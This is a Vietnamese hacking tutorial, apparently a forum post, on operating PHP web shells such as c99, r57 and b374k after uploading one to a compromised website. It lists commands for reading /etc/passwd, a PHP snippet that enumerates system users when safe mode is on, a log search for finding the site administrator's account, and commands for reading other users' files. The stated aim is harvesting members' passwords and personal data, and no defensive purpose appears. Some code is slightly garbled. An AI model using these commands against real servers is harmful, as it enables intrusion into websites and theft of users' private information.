Cơ bản về cách sử dụng các shell phổ biến

Ở bài này mình sẽ hướng dẫn với một số shell phổ biến như R57, c100,c99,b374k,v…v… Với các shell khác có chức năng tương tự các bạn tự tìm hiểu nhé. Vì nó không khác nhau là mấy nên bây giờ mình sẽ bắt đầu:

Sau khi upload shell thành công lên một web, nhiều bạn sẽ rất bỡ ngỡ khi vào giao diện của một con shell vì nó rất nhiều câu lệnh,  vùng chọn và chữ  tuy nhiên bạn có thể thấy đơn giản hơn như sau

Bạn có thể thấy phần rộng nhất là phần quản lý File Manager của trang, nhiều bạn up shell và sử dụng shell chỉ dùng đến chức năng này tuy nhiên nếu để tìm tất cả như mật khẩu thành viên, email và thông tin của họ thì sẽ rất lâu và có nhiều người sẽ không thể tìm ra được

Lúc này chúng ta sẽ phải dùng đến các lệnh cơ bản, có thể áp dụng được trong tất cả các command của các loại shell

+ Lệnh 1 dùng để get list user

cat /etc/passwd
less /etc/passwd

Nếu Safe mode on thì có thể up file sau lên server và chạy

$i = 0; while ($i < 60000) { $line = posix_getpwuid($i); if (!empty($line)) { while (list ($key, $vl) = each($line)){ echo $vl.”n”; break; } } $i++; } ?>

Và

include(“/etc/passwd”); ?>

(Do file chứa user là passwd, còn file chứa pass thường là shadow, nhưng chúng ta ko xem được, phải get root)

Nhớ là để đuôi PHp nhé :v

+ Lệnh 2

Lệnh này dùng để check các path và có thể tìm được tài khoản của admin web, ở bước một chúng ta mới chỉ tìm ra user nhưng không biết user nào là của admin, bước hai chúng ta sẽ thực hiện việc đó qua lệnh

find /usr/local/apache/logs/ -name ‘error_log’ | xargs grep -E ‘domain.com’

sau khi ra được thì phải check lại một lần nữa xem đúng không bằng cách chạy ip server

http://ip của sver/~user

Nếu ra site đang local thì đúng rồi 

+ Lệnh 3

Xem một file trên host

cat /home/user/public_html/1.php (xem file 1.php)

+Lệnh 4

Xem một đường dẫn trên host

dir /home/user/public_html/abc( Xem thư mục abc )

Nguồn : AnonyVN